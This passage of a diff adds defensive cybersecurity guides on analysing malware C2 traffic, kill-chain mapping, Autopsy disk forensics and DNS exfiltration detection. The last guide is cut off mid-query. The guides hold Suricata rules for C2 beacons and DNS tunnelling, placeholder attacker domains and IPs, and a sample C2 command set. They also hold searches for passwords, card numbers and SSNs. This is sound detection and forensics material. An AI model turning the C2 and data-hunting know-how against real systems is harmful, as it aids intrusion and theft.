||||
if tcp.dport == 80 or tcp.dport == 443:
|
||||
if len(tcp.data) > 0:
|
||||
try:
|
||||
http = dpkt.http.Request(tcp.data)
|
||||
print(f"\n--- C2 REQUEST ---")
|
||||
print(f"Method: {http.method}")
|
||||
print(f"URI: {http.uri}")
|
||||
print(f"Headers: {dict(http.headers)}")
|
||||
if http.body:
|
||||
print(f"Body ({len(http.body)} bytes):")
|
||||
# Try Base64 decode
|
||||
try:
|
||||
decoded = base64.b64decode(http.body)
|
||||
print(f" Decoded: {decoded[:200]}")
|
||||
except:
|
||||
print(f" Raw: {http.body[:200]}")
|
||||
except:
|
||||
pass
|
||||
```
|
||||
|
||||
### Step 4: Identify C2 Framework
|
||||
|
||||
Match observed patterns to known C2 frameworks:
|
||||
|
||||
```
|
||||
Known C2 Framework Signatures:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
Cobalt Strike:
|
||||
- Default URIs: /pixel, /submit.php, /___utm.gif, /ca, /dpixel
|
||||
- Malleable C2 profiles customize all traffic characteristics
|
||||
- JA3: varies by profile, catalog at ja3er.com
|
||||
- Watermark in beacon config (unique per license)
|
||||
- Config extraction: use CobaltStrikeParser or 1768.py
|
||||
|
||||
Metasploit/Meterpreter:
|
||||
- Default staging URI patterns: random 4-char checksum
|
||||
- Reverse HTTP(S) handler patterns
|
||||
- Meterpreter TLV (Type-Length-Value) protocol structure
|
||||
|
||||
Sliver:
|
||||
- mTLS, HTTP, DNS, WireGuard transport options
|
||||
- Protobuf-encoded messages
|
||||
- Unique implant ID in communication
|
||||
|
||||
Covenant:
|
||||
- .NET-based C2 framework
|
||||
- HTTP with customizable profiles
|
||||
- Task-based command execution
|
||||
|
||||
PoshC2:
|
||||
- PowerShell/C# based
|
||||
- HTTP with encrypted payloads
|
||||
- Cookie-based session management
|
||||
```
|
||||
|
||||
```bash
|
||||
# Extract Cobalt Strike beacon configuration from PCAP or sample
|
||||
python3 << 'PYEOF'
|
||||
# Using CobaltStrikeParser (pip install cobalt-strike-parser)
|
||||
from cobalt_strike_parser import BeaconConfig
|
||||
|
||||
try:
|
||||
config = BeaconConfig.from_file("suspect.exe")
|
||||
print("Cobalt Strike Beacon Configuration:")
|
||||
for key, value in config.items():
|
||||
print(f" {key}: {value}")
|
||||
except Exception as e:
|
||||
print(f"Not a Cobalt Strike beacon or parse error: {e}")
|
||||
PYEOF
|
||||
```
|
||||
|
||||
### Step 5: Map C2 Infrastructure
|
||||
|
||||
Document the full C2 infrastructure and failover mechanisms:
|
||||
|
||||
```python
|
||||
# Infrastructure mapping
|
||||
import requests
|
||||
import json
|
||||
|
||||
c2_indicators = {
|
||||
"primary_c2": "185.220.101.42",
|
||||
"domains": ["update.malicious.com", "backup.evil.net"],
|
||||
"ports": [443, 8443],
|
||||
"failover_dns": ["ns1.malicious-dns.com"],
|
||||
}
|
||||
|
||||
# Enrich with Shodan
|
||||
def shodan_lookup(ip, api_key):
|
||||
resp = requests.get(f"https://api.shodan.io/shodan/host/{ip}?key={api_key}")
|
||||
if resp.status_code == 200:
|
||||
data = resp.json()
|
||||
return {
|
||||
"ip": ip,
|
||||
"ports": data.get("ports", []),
|
||||
"os": data.get("os"),
|
||||
"org": data.get("org"),
|
||||
"asn": data.get("asn"),
|
||||
"country": data.get("country_code"),
|
||||
"hostnames": data.get("hostnames", []),
|
||||
"last_update": data.get("last_update"),
|
||||
}
|
||||
return None
|
||||
|
||||
# Enrich with passive DNS
|
||||
def pdns_lookup(domain):
|
||||
# Using VirusTotal passive DNS
|
||||
resp = requests.get(
|
||||
f"https://www.virustotal.com/api/v3/domains/{domain}/resolutions",
|
||||
headers={"x-apikey": VT_API_KEY}
|
||||
)
|
||||
if resp.status_code == 200:
|
||||
data = resp.json()
|
||||
resolutions = []
|
||||
for r in data.get("data", []):
|
||||
resolutions.append({
|
||||
"ip": r["attributes"]["ip_address"],
|
||||
"date": r["attributes"]["date"],
|
||||
})
|
||||
return resolutions
|
||||
return []
|
||||
```
|
||||
|
||||
### Step 6: Create Network Detection Signatures
|
||||
|
||||
Build detection rules based on analyzed C2 characteristics:
|
||||
|
||||
```bash
|
||||
# Suricata rules for the analyzed C2
|
||||
cat << 'EOF' > c2_detection.rules
|
||||
# HTTP beacon pattern
|
||||
alert http $HOME_NET any -> $EXTERNAL_NET any (
|
||||
msg:"MALWARE MalwareX C2 HTTP Beacon";
|
||||
flow:established,to_server;
|
||||
http.method; content:"POST";
|
||||
http.uri; content:"/gate.php"; startswith;
|
||||
http.header; content:"User-Agent: Mozilla/5.0 (compatible; MSIE 10.0)";
|
||||
threshold:type threshold, track by_src, count 5, seconds 600;
|
||||
sid:9000010; rev:1;
|
||||
)
|
||||
|
||||
# JA3 fingerprint match
|
||||
alert tls $HOME_NET any -> $EXTERNAL_NET any (
|
||||
msg:"MALWARE MalwareX TLS JA3 Fingerprint";
|
||||
ja3.hash; content:"a0e9f5d64349fb13191bc781f81f42e1";
|
||||
sid:9000011; rev:1;
|
||||
)
|
||||
|
||||
# DNS beacon detection (high-entropy subdomain)
|
||||
alert dns $HOME_NET any -> any any (
|
||||
msg:"MALWARE Suspected DNS C2 Tunneling";
|
||||
dns.query; pcre:"/^[a-z0-9]{20,}\./";
|
||||
threshold:type threshold, track by_src, count 10, seconds 60;
|
||||
sid:9000012; rev:1;
|
||||
)
|
||||
|
||||
# Certificate-based detection
|
||||
alert tls $HOME_NET any -> $EXTERNAL_NET any (
|
||||
msg:"MALWARE MalwareX Self-Signed C2 Certificate";
|
||||
tls.cert_subject; content:"CN=update.malicious.com";
|
||||
sid:9000013; rev:1;
|
||||
)
|
||||
EOF
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **Beaconing** | Periodic check-in communication from malware to C2 server at regular intervals, often with jitter to avoid pattern detection |
|
||||
| **Jitter** | Randomization applied to beacon interval (e.g., 60s +/- 15%) to make the timing pattern less predictable and harder to detect |
|
||||
| **Malleable C2** | Cobalt Strike feature allowing operators to customize all aspects of C2 traffic (URIs, headers, encoding) to mimic legitimate services |
|
||||
| **Dead Drop** | Intermediate location (paste site, cloud storage, social media) where C2 commands are posted for the malware to retrieve |
|
||||
| **Domain Fronting** | Using a trusted CDN domain in the TLS SNI while routing to a different backend, making C2 traffic appear to go to a legitimate service |
|
||||
| **Fast Flux** | Rapidly changing DNS records for C2 domains to distribute across many IPs and resist takedown efforts |
|
||||
| **C2 Framework** | Software toolkit providing C2 server, implant generator, and operator interface (Cobalt Strike, Metasploit, Sliver, Covenant) |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Wireshark**: Packet analyzer for detailed C2 protocol analysis at the packet level
|
||||
- **RITA (Real Intelligence Threat Analytics)**: Open-source tool analyzing Zeek logs for beacon detection and DNS tunneling
|
||||
- **CobaltStrikeParser**: Tool extracting Cobalt Strike beacon configuration from samples and memory dumps
|
||||
- **JA3/JA3S**: TLS fingerprinting method for identifying C2 frameworks by their TLS implementation characteristics
|
||||
- **Shodan/Censys**: Internet scanning platforms for mapping C2 infrastructure and identifying related servers
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Reverse Engineering a Custom C2 Protocol
|
||||
|
||||
**Context**: A malware sample communicates with its C2 server using an unknown binary protocol over TCP port 8443. The protocol needs to be decoded to understand the command set and build detection signatures.
|
||||
|
||||
**Approach**:
|
||||
1. Filter PCAP for TCP port 8443 conversations and extract the TCP streams
|
||||
2. Analyze the first few exchanges to identify the handshake/authentication mechanism
|
||||
3. Map the message structure (length prefix, type field, payload encoding)
|
||||
4. Cross-reference with Ghidra disassembly of the send/receive functions in the malware
|
||||
5. Identify the command dispatcher and document each command code's function
|
||||
6. Build a protocol decoder in Python for ongoing traffic analysis
|
||||
7. Create Suricata rules matching the protocol handshake or static header bytes
|
||||
|
||||
**Pitfalls**:
|
||||
- Assuming the protocol is static; some C2 frameworks negotiate encryption during the handshake
|
||||
- Not capturing enough traffic to see all command types (some commands are rare)
|
||||
- Missing fallback C2 channels (DNS, ICMP) that activate when the primary channel fails
|
||||
- Confusing encrypted payload data with the protocol framing structure
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
C2 COMMUNICATION ANALYSIS REPORT
|
||||
===================================
|
||||
Sample: malware.exe (SHA-256: e3b0c44...)
|
||||
C2 Framework: Cobalt Strike 4.9
|
||||
|
||||
BEACON CONFIGURATION
|
||||
C2 Server: hxxps://185.220.101[.]42/updates
|
||||
Beacon Type: HTTPS (reverse)
|
||||
Sleep: 60 seconds
|
||||
Jitter: 15%
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
|
||||
URI (GET): /dpixel
|
||||
URI (POST): /submit.php
|
||||
Watermark: 1234567890
|
||||
|
||||
PROTOCOL ANALYSIS
|
||||
Transport: HTTPS (TLS 1.2)
|
||||
JA3 Hash: a0e9f5d64349fb13191bc781f81f42e1
|
||||
Certificate: CN=Microsoft Update (self-signed)
|
||||
Encoding: Base64 with XOR key 0x69
|
||||
Command Format: [4B length][4B command_id][payload]
|
||||
|
||||
COMMAND SET
|
||||
0x01 - Sleep Change beacon interval
|
||||
0x02 - Shell Execute cmd.exe command
|
||||
0x03 - Download Transfer file from C2
|
||||
0x04 - Upload Exfiltrate file to C2
|
||||
0x05 - Inject Process injection
|
||||
0x06 - Keylog Start keylogger
|
||||
0x07 - Screenshot Capture screen
|
||||
|
||||
INFRASTRUCTURE
|
||||
Primary: 185.220.101[.]42 (AS12345, Hosting Co, NL)
|
||||
Failover: 91.215.85[.]17 (AS67890, VPS Provider, RU)
|
||||
DNS: update.malicious[.]com -> 185.220.101[.]42
|
||||
Registrar: NameCheap
|
||||
Registration: 2025-09-01
|
||||
|
||||
DETECTION SIGNATURES
|
||||
SID 9000010: HTTP beacon pattern
|
||||
SID 9000011: JA3 TLS fingerprint
|
||||
SID 9000013: C2 certificate match
|
||||
```
|
||||
@@ -0,0 +1,129 @@
|
||||
---
|
||||
name: analyzing-cyber-kill-chain
|
||||
description: >
|
||||
Analyzes intrusion activity against the Lockheed Martin Cyber Kill Chain framework to identify
|
||||
which phases an adversary has completed, where defenses succeeded or failed, and what controls
|
||||
would have interrupted the attack at earlier phases. Use when conducting post-incident analysis,
|
||||
building prevention-focused security controls, or mapping detection gaps to kill chain phases.
|
||||
Activates for requests involving kill chain analysis, intrusion kill chain, attack phase mapping,
|
||||
or Lockheed Martin kill chain framework.
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [kill-chain, Lockheed-Martin, MITRE-ATT&CK, intrusion-analysis, defense-in-depth, NIST-CSF]
|
||||
version: 1.0.0
|
||||
author: team-cybersecurity
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Cyber Kill Chain
|
||||
|
||||
## When to Use
|
||||
|
||||
Use this skill when:
|
||||
- Conducting post-incident analysis to determine how far an adversary progressed through an attack sequence
|
||||
- Designing layered defensive controls with the goal of interrupting attacks at the earliest possible phase
|
||||
- Producing threat intelligence reports that communicate attack progression to non-technical stakeholders
|
||||
|
||||
**Do not use** this skill as a standalone framework — combine with MITRE ATT&CK for technique-level granularity beyond what the 7-phase kill chain provides.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Complete incident timeline with forensic artifacts mapped to specific adversary actions
|
||||
- MITRE ATT&CK Enterprise matrix for technique-level mapping within each kill chain phase
|
||||
- Access to threat intelligence on the suspected adversary group's typical kill chain progression
|
||||
- Post-incident report or IR timeline from responding team
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Map Observed Actions to Kill Chain Phases
|
||||
|
||||
The Lockheed Martin Cyber Kill Chain consists of seven phases. Map all observed adversary actions:
|
||||
|
||||
**Phase 1 - Reconnaissance**: Adversary gathers target information before attack.
|
||||
- Indicators: DNS queries from adversary IP, LinkedIn scraping, job posting analysis, Shodan scans of organization infrastructure
|
||||
|
||||
**Phase 2 - Weaponization**: Adversary creates attack tool (malware + exploit).
|
||||
- Indicators: Malware compilation timestamps, exploit document metadata, builder artifacts in malware samples
|
||||
|
||||
**Phase 3 - Delivery**: Adversary transmits weapon to target.
|
||||
- Indicators: Phishing emails, malicious attachments, drive-by downloads, USB drops, supply chain compromise
|
||||
|
||||
**Phase 4 - Exploitation**: Adversary exploits vulnerability to execute code.
|
||||
- Indicators: CVE exploitation events in application/OS logs, memory corruption artifacts, shellcode execution
|
||||
|
||||
**Phase 5 - Installation**: Adversary establishes persistence on target.
|
||||
- Indicators: New scheduled tasks, registry run keys, service installation, web shells, bootkits
|
||||
|
||||
**Phase 6 - Command & Control (C2)**: Adversary communicates with compromised system.
|
||||
- Indicators: Beaconing traffic (regular intervals), DNS tunneling, HTTPS to uncommon domains, C2 framework signatures (Cobalt Strike, Sliver)
|
||||
|
||||
**Phase 7 - Actions on Objectives**: Adversary achieves goals.
|
||||
- Indicators: Data staging/exfiltration, lateral movement, ransomware execution, destructive activity
|
||||
|
||||
### Step 2: Identify Phase Completion and Detection Points
|
||||
|
||||
Create a phase matrix for the incident:
|
||||
```
|
||||
Phase 1: Recon → Completed (undetected)
|
||||
Phase 2: Weaponize → Completed (undetected — pre-attack)
|
||||
Phase 3: Delivery → Completed; phishing email bypassed SEG
|
||||
Phase 4: Exploit → Completed; CVE-2023-23397 exploited
|
||||
Phase 5: Install → DETECTED: EDR flagged scheduled task creation (attack stalled here)
|
||||
Phase 6: C2 → Not achieved (installation blocked)
|
||||
Phase 7: Objectives → Not achieved
|
||||
```
|
||||
|
||||
For each phase completed without detection, document the defensive control gap.
|
||||
|
||||
### Step 3: Map to MITRE ATT&CK for Technique Detail
|
||||
|
||||
Each kill chain phase maps to multiple ATT&CK tactics:
|
||||
- Delivery → Initial Access (TA0001)
|
||||
- Exploitation → Execution (TA0002)
|
||||
- Installation → Persistence (TA0003), Privilege Escalation (TA0004)
|
||||
- C2 → Command and Control (TA0011)
|
||||
- Actions on Objectives → Exfiltration (TA0010), Impact (TA0040)
|
||||
|
||||
Within each phase, enumerate specific ATT&CK techniques observed and map to existing detections.
|
||||
|
||||
### Step 4: Identify Courses of Action per Phase
|
||||
|
||||
For each phase, document applicable defensive courses of action (COAs):
|
||||
- **Detect COA**: What detection would alert on adversary activity in this phase?
|
||||
- **Deny COA**: What control would prevent the adversary from completing this phase?
|
||||
- **Disrupt COA**: What control would interrupt the adversary mid-phase?
|
||||
- **Degrade COA**: What control would reduce the adversary's effectiveness in this phase?
|
||||
- **Deceive COA**: What deception (honeypots, canary tokens) would expose activity in this phase?
|
||||
- **Destroy COA**: What active defense capability would neutralize adversary infrastructure?
|
||||
|
||||
### Step 5: Produce Kill Chain Analysis Report
|
||||
|
||||
Structure findings as:
|
||||
1. Attack narrative (timeline of phases)
|
||||
2. Phase-by-phase analysis with evidence
|
||||
3. Detection point analysis (what worked, what failed)
|
||||
4. Defensive recommendation per phase prioritized by cost/effectiveness
|
||||
5. Control improvement roadmap
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|-----------|
|
||||
| **Kill Chain** | Sequential model of adversary intrusion phases; breaking any link theoretically stops the attack |
|
||||
| **Courses of Action (COA)** | Defensive responses mapped to each kill chain phase: detect, deny, disrupt, degrade, deceive, destroy |
|
||||
| **Beaconing** | Regular, periodic C2 check-in pattern from compromised host to adversary server; detectable by frequency analysis |
|
||||
| **Phase Completion** | Adversary successfully finishes a kill chain phase and progresses to the next; defense-in-depth aims to prevent this |
|
||||
| **Intelligence Gain/Loss** | Analysis of whether detecting at Phase 5 (vs. Phase 3) reduced intelligence about adversary capabilities or intent |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **MITRE ATT&CK Navigator**: Overlay kill chain phases with ATT&CK technique coverage for integrated analysis
|
||||
- **Elastic Security EQL**: Event Query Language for querying multi-phase attack sequences in Elastic SIEM
|
||||
- **Splunk ES**: Timeline visualization and correlation searches for kill chain phase sequencing
|
||||
- **MISP**: Kill chain tagging via galaxy clusters for structured incident event documentation
|
||||
|
||||
## Common Pitfalls
|
||||
|
||||
- **Linear assumption**: Adversaries don't always progress linearly — they may skip phases (weaponization already complete from previous campaign) or loop back (re-establish C2 after detection).
|
||||
- **Ignoring Phases 1 and 2**: Reconnaissance and weaponization occur before the defender has visibility. Intelligence about these phases requires external sources (OSINT, threat intelligence).
|
||||
- **Missing insider threats**: The kill chain was designed for external adversaries. Insider threats may skip directly to Phase 7 without traversing earlier phases.
|
||||
- **Confusing with ATT&CK tactics**: The 7-phase kill chain and 14 ATT&CK tactics are complementary but not directly equivalent. Maintain distinction to prevent analytic confusion.
|
||||
@@ -0,0 +1,252 @@
|
||||
---
|
||||
name: analyzing-disk-image-with-autopsy
|
||||
description: Perform comprehensive forensic analysis of disk images using Autopsy to recover files, examine artifacts, and build investigation timelines.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, autopsy, disk-analysis, sleuth-kit, file-recovery, artifact-analysis]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Disk Image with Autopsy
|
||||
|
||||
## When to Use
|
||||
- When you have a forensic disk image and need structured analysis of its contents
|
||||
- During investigations requiring file recovery, keyword searching, and timeline analysis
|
||||
- When non-technical stakeholders need visual reports from forensic evidence
|
||||
- For examining file system metadata, deleted files, and embedded artifacts
|
||||
- When building a comprehensive case from multiple disk images
|
||||
|
||||
## Prerequisites
|
||||
- Autopsy 4.x installed (Windows) or Autopsy 4.x with The Sleuth Kit (Linux)
|
||||
- Forensic disk image in raw (dd), E01 (EnCase), or AFF format
|
||||
- Minimum 8GB RAM (16GB recommended for large images)
|
||||
- Java Runtime Environment (JRE) 8+ for Autopsy
|
||||
- Sufficient disk space for the Autopsy case database (2-3x image size)
|
||||
- Hash databases (NSRL, known-bad hashes) for file identification
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Install Autopsy and Configure Environment
|
||||
|
||||
```bash
|
||||
# On Linux, install Sleuth Kit and Autopsy
|
||||
sudo apt-get install autopsy sleuthkit
|
||||
|
||||
# Download Autopsy 4.x (GUI version) from official source
|
||||
wget https://github.com/sleuthkit/autopsy/releases/download/autopsy-4.21.0/autopsy-4.21.0.zip
|
||||
unzip autopsy-4.21.0.zip -d /opt/autopsy
|
||||
|
||||
# On Windows, run the MSI installer from sleuthkit.org
|
||||
# Launch Autopsy
|
||||
/opt/autopsy/bin/autopsy --nosplash
|
||||
|
||||
# For Sleuth Kit command-line analysis alongside Autopsy
|
||||
sudo apt-get install sleuthkit
|
||||
```
|
||||
|
||||
### Step 2: Create a New Case and Add the Disk Image
|
||||
|
||||
```
|
||||
1. Launch Autopsy > "New Case"
|
||||
2. Enter Case Name: "CASE-2024-001-Workstation"
|
||||
3. Set Base Directory: /cases/case-2024-001/autopsy/
|
||||
4. Enter Case Number, Examiner Name
|
||||
5. Click "Add Data Source"
|
||||
6. Select "Disk Image or VM File"
|
||||
7. Browse to: /cases/case-2024-001/images/evidence.dd
|
||||
8. Select Time Zone of the original system
|
||||
9. Configure Ingest Modules (see Step 3)
|
||||
```
|
||||
|
||||
```bash
|
||||
# Alternatively, use Sleuth Kit CLI to verify the image first
|
||||
img_stat /cases/case-2024-001/images/evidence.dd
|
||||
|
||||
# List partitions in the image
|
||||
mmls /cases/case-2024-001/images/evidence.dd
|
||||
|
||||
# Output example:
|
||||
# DOS Partition Table
|
||||
# Offset Sector: 0
|
||||
# Units are in 512-byte sectors
|
||||
# Slot Start End Length Description
|
||||
# 00: ----- 0000000000 0000002047 0000002048 Primary Table (#0)
|
||||
# 01: 00:00 0000002048 0001026047 0001024000 NTFS (0x07)
|
||||
# 02: 00:01 0001026048 0976771071 0975745024 NTFS (0x07)
|
||||
|
||||
# List files in a partition (offset 2048 sectors)
|
||||
fls -o 2048 /cases/case-2024-001/images/evidence.dd
|
||||
```
|
||||
|
||||
### Step 3: Configure and Run Ingest Modules
|
||||
|
||||
```
|
||||
Enable the following Autopsy Ingest Modules:
|
||||
- Recent Activity: Extracts browser history, downloads, cookies, bookmarks
|
||||
- Hash Lookup: Compares files against NSRL and known-bad hash sets
|
||||
- File Type Identification: Identifies files by signature, not extension
|
||||
- Keyword Search: Indexes content for full-text searching
|
||||
- Email Parser: Extracts emails from PST, MBOX, EML files
|
||||
- Extension Mismatch Detector: Finds files with wrong extensions
|
||||
- Exif Parser: Extracts metadata from images (GPS, camera, timestamps)
|
||||
- Encryption Detection: Identifies encrypted files and containers
|
||||
- Interesting Files Identifier: Flags files matching custom rule sets
|
||||
- Embedded File Extractor: Extracts files from ZIP, Office docs, PDFs
|
||||
- Picture Analyzer: Categorizes images using PhotoDNA or hash matching
|
||||
- Data Source Integrity: Verifies image hash during ingest
|
||||
```
|
||||
|
||||
```bash
|
||||
# Configure NSRL hash set for known-good filtering
|
||||
# Download NSRL from https://www.nist.gov/itl/ssd/software-quality-group/national-software-reference-library-nsrl
|
||||
wget https://s3.amazonaws.com/rds.nsrl.nist.gov/RDS/current/rds_modernm.zip
|
||||
unzip rds_modernm.zip -d /opt/autopsy/hashsets/
|
||||
|
||||
# Import into Autopsy:
|
||||
# Tools > Options > Hash Sets > Import > Select NSRLFile.txt
|
||||
# Mark as "Known" (to filter out known-good files)
|
||||
```
|
||||
|
||||
### Step 4: Analyze File System and Recover Deleted Files
|
||||
|
||||
```bash
|
||||
# In Autopsy GUI: Navigate tree structure
|
||||
# - Data Sources > evidence.dd > vol2 (NTFS)
|
||||
# - Examine directory tree, note deleted files (marked with X)
|
||||
|
||||
# Using Sleuth Kit CLI for targeted recovery
|
||||
# List deleted files
|
||||
fls -rd -o 2048 /cases/case-2024-001/images/evidence.dd
|
||||
|
||||
# Recover a specific deleted file by inode
|
||||
icat -o 2048 /cases/case-2024-001/images/evidence.dd 14523 > /cases/case-2024-001/recovered/deleted_document.docx
|
||||
|
||||
# Extract all files from a directory
|
||||
tsk_recover -o 2048 -d /Users/suspect/Documents \
|
||||
/cases/case-2024-001/images/evidence.dd \
|
||||
/cases/case-2024-001/recovered/documents/
|
||||
|
||||
# Get detailed file metadata
|
||||
istat -o 2048 /cases/case-2024-001/images/evidence.dd 14523
|
||||
# Shows: creation, modification, access, MFT change timestamps, size, data runs
|
||||
```
|
||||
|
||||
### Step 5: Perform Keyword Searches and Tag Evidence
|
||||
|
||||
```
|
||||
In Autopsy:
|
||||
1. Keyword Search panel > "Ad Hoc Keyword Search"
|
||||
2. Search terms: credit card patterns, SSN regex, email addresses
|
||||
3. Example regex for credit cards: \b(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})\b
|
||||
4. Example regex for SSN: \b\d{3}-\d{2}-\d{4}\b
|
||||
5. Review results > Right-click items > "Add Tag"
|
||||
6. Create tags: "Evidence-Critical", "Evidence-Supporting", "Requires-Review"
|
||||
7. Add comments to tagged items documenting relevance
|
||||
```
|
||||
|
||||
```bash
|
||||
# Using Sleuth Kit for CLI keyword search
|
||||
srch_strings -a -o 2048 /cases/case-2024-001/images/evidence.dd | \
|
||||
grep -iE '(password|secret|confidential)' > /cases/case-2024-001/keyword_hits.txt
|
||||
|
||||
# Search for specific file signatures
|
||||
sigfind -o 2048 /cases/case-2024-001/images/evidence.dd 25504446
|
||||
# 25504446 = %PDF header signature
|
||||
```
|
||||
|
||||
### Step 6: Build Timeline and Generate Reports
|
||||
|
||||
```
|
||||
In Autopsy:
|
||||
1. Timeline viewer: Tools > Timeline
|
||||
2. Select date range of interest (incident window)
|
||||
3. Filter by event type: File Created, Modified, Accessed, Web Activity
|
||||
4. Zoom into suspicious time periods
|
||||
5. Export timeline events as CSV for external analysis
|
||||
|
||||
Generate Report:
|
||||
1. Generate Report > HTML Report
|
||||
2. Select tagged items and data sources to include
|
||||
3. Configure report sections: file listings, keyword hits, timeline
|
||||
4. Export to /cases/case-2024-001/reports/
|
||||
```
|
||||
|
||||
```bash
|
||||
# Using Sleuth Kit mactime for CLI timeline
|
||||
fls -r -m "/" -o 2048 /cases/case-2024-001/images/evidence.dd > /cases/case-2024-001/bodyfile.txt
|
||||
|
||||
# Generate timeline from bodyfile
|
||||
mactime -b /cases/case-2024-001/bodyfile.txt -d > /cases/case-2024-001/timeline.csv
|
||||
|
||||
# Filter timeline to specific date range
|
||||
mactime -b /cases/case-2024-001/bodyfile.txt \
|
||||
-d 2024-01-15..2024-01-20 > /cases/case-2024-001/incident_timeline.csv
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|
||||
|---------|-------------|
|
||||
| Ingest Modules | Automated analysis plugins that process data sources upon import |
|
||||
| MFT (Master File Table) | NTFS metadata structure recording all file entries and attributes |
|
||||
| File carving | Recovering files from unallocated space using file signatures |
|
||||
| Hash filtering | Using NSRL or custom hash sets to exclude known-good or flag known-bad files |
|
||||
| Timeline analysis | Chronological reconstruction of file system and user activity events |
|
||||
| Deleted file recovery | Restoring files whose directory entries are removed but data remains |
|
||||
| Keyword indexing | Full-text search index built from all file content including slack space |
|
||||
| Artifact extraction | Automated parsing of browser, email, registry, and OS-specific artifacts |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| Autopsy | Open-source GUI forensic platform for disk image analysis |
|
||||
| The Sleuth Kit (TSK) | Command-line forensic toolkit underlying Autopsy |
|
||||
| fls | List files and directories in a disk image including deleted entries |
|
||||
| icat | Extract file content by inode number from a disk image |
|
||||
| mactime | Generate timeline from TSK bodyfile format |
|
||||
| mmls | Display partition layout of a disk image |
|
||||
| NSRL | NIST hash database for identifying known software files |
|
||||
| sigfind | Search for file signatures at the sector level |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: Employee Data Theft Investigation**
|
||||
Import the employee workstation image, run all ingest modules, search for company-confidential file names and keywords, examine USB connection artifacts in Recent Activity, check for cloud storage client artifacts, review deleted files for evidence of data staging, generate HTML report for legal team.
|
||||
|
||||
**Scenario 2: Malware Infection Forensics**
|
||||
Add the compromised system image, enable Extension Mismatch and Encryption Detection modules, examine the prefetch directory for execution evidence, search for known malware hashes, build timeline around the infection window, extract suspicious executables for further analysis in a sandbox.
|
||||
|
||||
**Scenario 3: Child Exploitation Material (CSAM) Investigation**
|
||||
Import image with PhotoDNA and Project VIC hash sets enabled, run Picture Analyzer module, hash all image files against known-bad databases, tag and categorize matches by severity, generate law enforcement report with chain of custody documentation.
|
||||
|
||||
**Scenario 4: Intellectual Property Dispute**
|
||||
Import multiple employee disk images as separate data sources in one case, perform keyword searches for proprietary terms and project names, compare file hashes between sources, build timeline showing file access and transfer patterns, export evidence for legal review.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
Autopsy Case Analysis Summary:
|
||||
Case: CASE-2024-001-Workstation
|
||||
Image: evidence.dd (500GB NTFS)
|
||||
Partitions: 2 (System Reserved + Primary)
|
||||
Total Files: 245,832
|
||||
Deleted Files: 12,456 (recoverable: 8,234)
|
||||
|
||||
Ingest Results:
|
||||
Hash Matches (Known Bad): 3 files
|
||||
Extension Mismatches: 17 files
|
||||
Keyword Hits: 234 across 45 files
|
||||
Encrypted Files: 5 containers detected
|
||||
EXIF Data Extracted: 1,245 images with metadata
|
||||
|
||||
Tagged Evidence:
|
||||
Critical: 12 items
|
||||
Supporting: 34 items
|
||||
Review: 67 items
|
||||
|
||||
Timeline Events: 1,234,567 entries (filtered to incident window: 892)
|
||||
Report: /cases/case-2024-001/reports/autopsy_report.html
|
||||
```
|
||||
@@ -0,0 +1,287 @@
|
||||
---
|
||||
name: analyzing-dns-logs-for-exfiltration
|
||||
description: >
|
||||
Analyzes DNS query logs to detect data exfiltration via DNS tunneling, DGA domain communication,
|
||||
and covert C2 channels using entropy analysis, query volume anomalies, and subdomain length
|
||||
detection in SIEM platforms. Use when SOC teams need to identify DNS-based threats that bypass
|
||||
traditional network security controls.
|
||||
domain: cybersecurity
|
||||
subdomain: soc-operations
|
||||
tags: [soc, dns, exfiltration, dns-tunneling, dga, c2-detection, splunk, threat-detection]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing DNS Logs for Exfiltration
|
||||
|
||||
## When to Use
|
||||
|
||||
Use this skill when:
|
||||
- SOC teams suspect data exfiltration through DNS tunneling to bypass firewall/proxy controls
|
||||
- Threat intelligence indicates adversaries using DNS-based C2 channels (e.g., Cobalt Strike DNS beacon)
|
||||
- UEBA detects anomalous DNS query volumes from specific hosts
|
||||
- Malware analysis reveals DNS-over-HTTPS (DoH) or DNS tunneling capabilities
|
||||
|
||||
**Do not use** for standard DNS troubleshooting or availability monitoring — this skill focuses on security-relevant DNS abuse detection.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- DNS query logging enabled (Windows DNS Server, Bind, Infoblox, or Cisco Umbrella)
|
||||
- DNS logs ingested into SIEM (Splunk with `Stream:DNS`, `dns` sourcetype, or Zeek DNS logs)
|
||||
- Passive DNS data for historical domain resolution analysis
|
||||
- Baseline of normal DNS behavior (query volume, domain distribution, TXT record frequency)
|
||||
- Python with `math` and `collections` libraries for entropy calculation
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Detect DNS Tunneling via Subdomain Length Analysis
|
||||
|
||||
DNS tunneling encodes data in subdomain labels, creating unusually long queries:
|
||||
|
||||
```spl
|
||||
index=dns sourcetype="stream:dns" query_type IN ("A", "AAAA", "TXT", "CNAME", "MX")
|
||||
| eval domain_parts = split(query, ".")
|
||||
| eval subdomain = mvindex(domain_parts, 0, mvcount(domain_parts)-3)
|
||||
| eval subdomain_str = mvjoin(subdomain, ".")
|
||||
